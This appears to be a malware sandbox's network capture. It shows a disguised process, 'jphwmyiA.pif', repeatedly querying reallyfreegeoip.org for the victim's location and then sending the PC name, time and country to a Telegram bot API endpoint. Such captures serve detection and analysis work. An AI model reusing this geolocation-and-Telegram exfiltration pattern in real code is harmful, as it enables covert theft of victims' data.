2025-01-07 12:25:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49895	188.114.97.3	443	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:31 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567521 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cwc0k6SSaOSF5cNW0jYlvTujt%2FIc457SUC0Gq7bmAQEC0GPuyjSYYpQYujYB%2BpoDEXU%2FTDFBo%2B2vLTxMwr%2FhiBY2P7kmpUW8lz7hpmzkfU3indkLqx1XVRCLrhDfMEJ18umqOqd0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee563974423e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1699&rtt_var=648&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1718658&cwnd=197&unsent_bytes=0&cid=7801d10d8bd7034b&ts=158&x=0"
2025-01-07 12:25:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49896	188.114.97.3	443	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:31 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-07 12:25:32 UTC	853	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567521 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MCZmID1PrAbabXQbKkONgTYQt4tAB%2F%2Bsiav9gb0HkqJwegS1RcDoyqVzXXLudEjZgWiYM5XUdvywbHSMTcvcHqTQBQXeYqcshOrH8PSlNTqEQR76cFJiMUAmKc1v4WrwpJiNvIYj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee573cb94349-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1570&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1812538&cwnd=227&unsent_bytes=0&cid=b88e404c8ec4442f&ts=143&x=0"
2025-01-07 12:25:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49897	188.114.97.3	443	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:32 UTC	853	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567521 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fr0oGA7d6AGd6Z46WZ6us6QALGHkjT0%2BNXLPZ1vvHNbWHBlFOv89mVNLgUvdCTm%2F7XfEMSsZZTjD8Mtl0oXtboEIF663TssHogPzgW0qIwTjS4OeO8stfL70qL4sU9sRvLlXaq1x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee574e1242ac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1716&rtt_var=657&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1647855&cwnd=215&unsent_bytes=0&cid=3cf231f4bf68b3f1&ts=138&x=0"
2025-01-07 12:25:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49912	188.114.97.3	443	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:33 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-07 12:25:33 UTC	857	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567523 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2oOERNuAD4pDjoc%2FjaNGk4GdCCQZl02gHYzKQd2Fj%2BtmaJ8sxMQfqKjrZlVQs4CMByO7S03ZbLDAe14tqBSePWzpne5%2BKPp%2F3aBNID5whwI43o0912gOVeItOKp7r9ISv5LU3ozj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee629c758ce2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2021&rtt_var=766&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1420233&cwnd=202&unsent_bytes=0&cid=569da648ced2730e&ts=154&x=0"
2025-01-07 12:25:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49913	188.114.97.3	443	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:33 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-07 12:25:34 UTC	855	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567523 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uGrjJiaQx6PzpBYuzCZCz4VQzybZ0bbzlpmckjlDlhRCED6wMe351M8Cdpjm5S0K3ZyTP93ml1eAesj1DrQceOGyjnW%2FYb%2FufEtuN63CD%2BAj6dxkfllrcLhJRadXSe0oj5kB4Vsr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee63886878d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1980&rtt_var=763&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1415414&cwnd=144&unsent_bytes=0&cid=2073eb716a09bed9&ts=156&x=0"
2025-01-07 12:25:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49914	188.114.97.3	443	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:34 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-07 12:25:34 UTC	853	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567523 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v3uBOEZ7mG9UVBHN0eNFIiVuYavBtdwnch9ohR7RsiLIAsz4ujtGQK2eYrstIKrJW74BE3P9gNMd5IPGGGCGIy%2FNmZnnqdIzFWzvBp8X04ohnDi7pZ8g7tRzWq8tykb%2BTIsj9QqT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee63fb9e7274-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1955&min_rtt=1948&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457085&cwnd=182&unsent_bytes=0&cid=310a1c8eae26b217&ts=139&x=0"
2025-01-07 12:25:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49920	149.154.167.220	443	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:34 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2023:15:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-07 12:25:34 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 07 Jan 2025 12:25:34 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-07 12:25:34 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49926	188.114.97.3	443	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:35 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:35 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567524 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GP8r3G7rWo9Ymyp3eXpvB2RQM9uUuZwGFpsQqWcydZ6ikzRziSgeqNuzoB%2BKhS8dvCab0%2B4%2BTeUyrnlgsiL9vLd4uvFb3wkkF00CFr%2BgXnvU5XJAGjHHlCuepZpx3ziuDfm3%2FRN2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee6b5fb941c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1751&rtt_var=661&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1650650&cwnd=205&unsent_bytes=0&cid=aa333d79fe738115&ts=149&x=0"
2025-01-07 12:25:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49927	188.114.97.3	443	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:35 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:35 UTC	852	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567524 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cjjmVQj%2FIjIENPclkqSzcXMIi0RjeIj3FDuCdQhzADv%2BjNuKg4HRXAIbVR6ImoWhBdPzC9DeqcyxkJ869DFqJwK3FcdWeZDVxH5IrSZfP19GonLEEuU8cRJnTklLT4gFj2sttUel"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee6cff614374-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1541&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1792510&cwnd=32&unsent_bytes=0&cid=1eba308d1aeb53fc&ts=130&x=0"
2025-01-07 12:25:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49939	188.114.97.3	443	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:36 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:36 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567525 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dHFzokkTpJlCH4q8rw8MV%2BE0dDHhrNtQWOZOJTPFT5BpUnG70v1nnzcv8vJH%2BN37NgIFKuwpjLdNJfYbk%2BrSQhceED1kQUq9OQXW0KHxG0ULCewpKkxO%2BZSWeDQ6c%2FnGTZe5KVrf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee743f25421b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1605&rtt_var=1257&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=690633&cwnd=187&unsent_bytes=0&cid=8296b8fb6cb058ef&ts=141&x=0"
2025-01-07 12:25:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New 